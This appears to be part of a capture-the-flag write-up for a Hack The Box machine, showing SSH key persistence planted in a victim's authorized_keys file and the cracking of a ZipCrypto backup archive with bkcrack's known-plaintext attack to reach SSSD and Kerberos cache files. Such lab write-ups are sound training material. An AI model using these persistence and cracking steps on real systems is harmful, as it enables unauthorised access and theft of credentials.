Enumeration

Persistence

ssh-keygen -t rsa -b 4096 -f backdoor_key -N ""

On the victim machine:

webster@webserver:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDLc/ZXDOsNZdE7fsCDzB57ib5lk91M/tpZDPQLBGqtg/uOW1lLKq68vJONu/nwTZRIxtymo1t9C4D17OH+3knB2tyavdN6puistzNsg6n8Cu8kftuBI3xCBKTfi5UlH+tJlENlSDMfTpUx7YDipjIpA1+MlIGom6moxFn03D8Vv8lDmOSZlt8e3Y4FPR3VRUbKS87E3UxAxtSweTi0Ts5zImtnud7oXkTetWbKifz6QkqosHJp3ovPu9Cg+FNu+/oU3Tjptb8ivG040LTPzVyeNEplwyPfLjsYlTBmLH1jRFWQTGBp4t5jC/z0X0TXYQBBglL4YAObitOqXQSPTVdypH60G44nLD0sTQFhYaLzLwQ/vY0ZNCiOazEjPXe0ZYOBVB72tUvyfIYyqd5rYlazJiVwxUHZjo96Vg3HbubMD3Tk9cDUwsh/F53Egzn4meY+LGcIiPQmmtnhgIF4/PvNdjScMmo7x6GJfcv3ua5D8elotZODLSIEbNGRJwzm9BGb3Y1MTJboIsRBXpgSAmFZ4IOO9ldo0nq0PgB8wJPSy8asPxucsc4tAHtxArqQQswcnUiu/YgBIVCG8ekAPik0l30pfIrSI8XCf83qEfc4gdMGl7aA6M5rbXfL1HZZt4sXayJPNz7wv2KjSAUoZzZzM7RcgKZgIDl//VmT8tm0vw== anonmak9@anonmak9' >> ~/.ssh/authorized_keys

chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

Now I can simply SSH:

ssh -i backdoor_key [email protected]

Moving On

There is a backup.zip file in home directory of the user. After downloading it with scp I tried to open it but its locked.

unzip backup.zip 
Archive:  backup.zip
[backup.zip] etc/passwd password:

unzip -l backup.zip 
Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1509  2022-04-30 10:27   etc/passwd
        0  2021-02-10 05:49   etc/sssd/conf.d/
      411  2022-04-29 07:39   etc/sssd/sssd.conf
        0  2022-07-28 06:31   var/lib/sss/db/
  1286144  2022-07-28 06:24   var/lib/sss/db/timestamps_windcorp.htb.ldb
  1286144  2022-07-28 06:16   var/lib/sss/db/config.ldb
        0  2022-07-28 06:16   var/lib/sss/db/test/
  1286144  2022-07-28 06:01   var/lib/sss/db/test/timestamps_windcorp.htb.ldb
  1286144  2022-07-28 06:04   var/lib/sss/db/test/config.ldb
  1286144  2022-07-28 06:12   var/lib/sss/db/test/cache_windcorp.htb.ldb
  1286144  2022-04-30 11:51   var/lib/sss/db/test/sssd.ldb
     4016  2022-07-28 06:04   var/lib/sss/db/test/ccache_WINDCORP.HTB
  1609728  2022-07-28 06:38   var/lib/sss/db/cache_windcorp.htb.ldb
  1286144  2022-07-28 06:16   var/lib/sss/db/sssd.ldb
     2708  2022-07-28 06:31   var/lib/sss/db/ccache_WINDCORP.HTB
        0  2021-02-10 05:49   var/lib/sss/deskprofile/
        0  2022-04-29 07:45   var/lib/sss/gpo_cache/
        0  2022-04-29 07:45   var/lib/sss/gpo_cache/windcorp.htb/
        0  2022-04-29 07:45   var/lib/sss/gpo_cache/windcorp.htb/Policies/
        0  2022-07-28 06:24   var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
        0  2022-04-29 07:45   var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
        0  2022-04-29 07:45   var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
        0  2022-04-29 07:45   var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
        0  2022-07-28 06:23   var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
     2568  2022-07-28 06:23   var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
       23  2022-07-28 06:24   var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
        0  2021-02-10 05:49   var/lib/sss/keytabs/
        0  2022-07-28 06:16   var/lib/sss/mc/
  9253600  2022-07-28 06:24   var/lib/sss/mc/passwd
  6940392  2022-07-28 06:16   var/lib/sss/mc/group
 11567160  2022-07-28 06:23   var/lib/sss/mc/initgroups
        0  2022-07-28 06:16   var/lib/sss/pipes/
        0  2022-07-28 06:16   var/lib/sss/pipes/private/
        0  2022-07-28 06:31   var/lib/sss/pubconf/
       12  2022-07-28 06:31   var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
        0  2022-07-28 06:16   var/lib/sss/pubconf/krb5.include.d/
       40  2022-07-28 06:16   var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
      113  2022-07-28 06:16   var/lib/sss/pubconf/krb5.include.d/localauth_plugin
       15  2022-07-28 06:16   var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
        0  2021-02-10 05:49   var/lib/sss/secrets/
---------                     -------
 38385303                     40 files

We see sss files. We can confirm that sss is running

webster@webserver:~$ ps auxww | grep sss
root         334  0.0  2.4  97200 22672 ?        Ss   Feb12   0:00 /usr/sbin/sssd -i --logger=files
root         426  0.0  2.9 116928 27528 ?        S    Feb12   0:01 /usr/libexec/sssd/sssd_be --domain windcorp.htb --uid 0 --gid 0 --logger=files
root         427  0.0  4.5 111912 42764 ?        S    Feb12   0:00 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root         428  0.0  2.3  85160 22168 ?        S    Feb12   0:00 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
webster     1578  0.0  0.0   6180   656 pts/1    S+   02:01   0:00 grep sss

sssd SSSD (System Security Services Daemon), is an open source client for connecting a Linux machine into Active Directory. sssd data are stored in /var/lib/sss, but I can’t access anything valuable as webster.

webster@webserver:/var/lib/sss$ ls -la
total 40
drwxr-xr-x 10 root root 4096 Apr 29  2022 .
drwxr-xr-x 31 root root 4096 Apr 29  2022 ..
drwx------  3 sssd sssd 4096 Feb 13 01:49 db
drwxr-x--x  2 root root 4096 Feb 10  2021 deskprofile
drwxr-xr-x  3 sssd sssd 4096 Apr 29  2022 gpo_cache
drwx------  2 sssd sssd 4096 Feb 10  2021 keytabs
drwxr-xr-x  2 sssd sssd 4096 Feb 12 09:18 mc
drwxr-xr-x  3 sssd sssd 4096 Feb 12 09:18 pipes
drwxr-xr-x  3 sssd sssd 4096 Feb 13 01:49 pubconf
drwx------  2 sssd sssd 4096 Feb 10  2021 secrets

The box info says we can crack the zip file using Known Plaintext Attack. And this can be used for our known plaintext. If we look into the zip file's encryption

7z l -slt backup.zip

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_CA.UTF-8 Threads:8 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 72984 bytes (72 KiB)

Listing archive: backup.zip

--
Path = backup.zip
Type = zip
Physical Size = 72984

----------
Path = etc/passwd
Folder = -
Size = 1509
Packed Size = 554
Modified = 2022-04-30 09:27:46
Created = 
Accessed = 
Attributes =  -rw-r--r--
Encrypted = +
Comment = 
CRC = D00EEE74
Method = ZipCrypto Deflate
Characteristics = UT:MA:1 ux : Encrypt Descriptor
Host OS = Unix
Version = 20
Volume Index = 0
Offset = 0

We see that it is encrypted with ZipCrypto, turns out it is susceptible to KPA. I can also use the bkcrack tool for this. This tutorial explains really well how this tool works.

bkcrack -L backup.zip 
bkcrack 1.7.1 - 2024-12-21
Archive: backup.zip
Index Encryption Compression CRC32    Uncompressed  Packed size Name
----- ---------- ----------- -------- ------------ ------------ ----------------
    0 ZipCrypto  Deflate     d00eee74         1509          554 etc/passwd
    1 None       Store       00000000            0            0 etc/sssd/conf.d/
    2 ZipCrypto  Deflate     a46408d2          411          278 etc/sssd/sssd.conf
    3 None       Store       00000000            0            0 var/lib/sss/db/
    4 ZipCrypto  Deflate     7c8f25f5      1286144         3122 var/lib/sss/db/timestamps_windcorp.htb.ldb
    5 ZipCrypto  Deflate     1586648d      1286144         2492 var/lib/sss/db/config.ldb
    6 None       Store       00000000            0            0 var/lib/sss/db/test/
    7 ZipCrypto  Deflate     2dda0c65      1286144         2421 var/lib/sss/db/test/timestamps_windcorp.htb.ldb
    8 ZipCrypto  Deflate     861052a8      1286144         2536 var/lib/sss/db/test/config.ldb
    9 ZipCrypto  Deflate     cdf7b29c      1286144         5044 var/lib/sss/db/test/cache_windcorp.htb.ldb
   10 ZipCrypto  Deflate     2d029dc7      1286144         1505 var/lib/sss/db/test/sssd.ldb
   11 ZipCrypto  Deflate     22cd39c0         4016         3651 var/lib/sss/db/test/ccache_WINDCORP.HTB
   12 ZipCrypto  Deflate     8ff31622      1609728        10145 var/lib/sss/db/cache_windcorp.htb.ldb
   13 ZipCrypto  Deflate     2d029dc7      1286144         1505 var/lib/sss/db/sssd.ldb
   14 ZipCrypto  Deflate     c6656211         2708         2519 var/lib/sss/db/ccache_WINDCORP.HTB
   15 None       Store       00000000            0            0 var/lib/sss/deskprofile/
   16 None       Store       00000000            0            0 var/lib/sss/gpo_cache/
   17 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/
   18 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/
   19 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
   20 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
   21 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
   22 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
   23 None       Store       00000000            0            0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
   24 ZipCrypto  Deflate     5b393fde         2568          700 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
   25 ZipCrypto  Store       74a7bec9           23           35 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
   26 None       Store       00000000            0            0 var/lib/sss/keytabs/
   27 None       Store       00000000            0            0 var/lib/sss/mc/
   28 ZipCrypto  Deflate     10c2d4bf      9253600         9186 var/lib/sss/mc/passwd
   29 ZipCrypto  Deflate     a0dedff3      6940392         6814 var/lib/sss/mc/group
   30 ZipCrypto  Deflate     09850b8d     11567160        11389 var/lib/sss/mc/initgroups
   31 None       Store       00000000            0            0 var/lib/sss/pipes/
   32 None       Store       00000000            0            0 var/lib/sss/pipes/private/
   33 None       Store       00000000            0            0 var/lib/sss/pubconf/
   34 ZipCrypto  Store       5a1a3ba3           12           24 var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
   35 None       Store       00000000            0            0 var/lib/sss/pubconf/krb5.include.d/
   36 ZipCrypto  Store       8c44e15f           40           52 var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
   37 ZipCrypto  Deflate     cc306b59          113          105 var/lib/sss/pubconf/krb5.include.d/localauth_plugin
   38 ZipCrypto  Store       701d2553           15           27 var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
   39 None       Store       00000000            0            0 var/lib/sss/secrets/

So we need a known plaintext. There are multiple files here to choose from. But we can use /etc/passwd file. We can get a copy of the current /etc/passwd and download it to our machine from webster. We have to zip the file

zip passwd.zip passwd

So now from the above result we see the CRC32 of the file is d00eee74.

What about the newly created passwd zip file?

bkcrack -L passwd.zip 
bkcrack 1.7.1 - 2024-12-21
Archive: passwd.zip
Index Encryption Compression CRC32    Uncompressed  Packed size Name
----- ---------- ----------- -------- ------------ ------------ ----------------
    0 None       Deflate     d00eee74         1509          542 passwd

its the same!

Cracking it we get the keys.

bkcrack -C backup.zip -c etc/passwd -P passwd.zip -p passwd    
bkcrack 1.7.1 - 2024-12-21
[19:47:26] Z reduction using 535 bytes of known plaintext
100.0 % (535 / 535)
[19:47:27] Attack on 14541 Z values at index 9
Keys: d6829d8d 8514ff97 afc3f825
91.3 % (13282 / 14541) 
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 13282
[19:47:39] Keys
d6829d8d 8514ff97 afc3f825

We can create another file which doesn't require password.

bkcrack -C backup.zip -k d6829d8d 8514ff97 afc3f825 -D backup_cracked.zip

After unzipping it.

tree                                
.
├── etc
│   ├── passwd
│   └── sssd
│       ├── conf.d
│       └── sssd.conf
└── var
    └── lib
        └── sss
            ├── db
            │   ├── cache_windcorp.htb.ldb
            │   ├── ccache_WINDCORP.HTB
            │   ├── config.ldb
            │   ├── sssd.ldb
            │   ├── test
            │   │   ├── cache_windcorp.htb.ldb
            │   │   ├── ccache_WINDCORP.HTB
            │   │   ├── config.ldb
            │   │   ├── sssd.ldb
            │   │   └── timestamps_windcorp.htb.ldb
            │   └── timestamps_windcorp.htb.ldb
            ├── deskprofile
            ├── gpo_cache
            │   └── windcorp.htb
            │       └── Policies
            │           └── {31B2F340-016D-11D2-945F-00C04FB984F9}
            │               ├── GPT.INI
            │               └── Machine
            │                   └── Microsoft
            │                       └── Windows NT
            │                           └── SecEdit
            │                               └── GptTmpl.inf
            ├── keytabs
            ├── mc
            │   ├── group
            │   ├── initgroups
            │   └── passwd
            ├── pipes
            │   └── private
            ├── pubconf
            │   ├── kdcinfo.WINDCORP.HTB
            │   └── krb5.include.d
            │       ├── domain_realm_windcorp_htb
            │       ├── krb5_libdefaults
            │       └── localauth_plugin
            └── secrets

25 directories, 21 files

PreviousFoothold NextPrivEsc

Last updated 10 months ago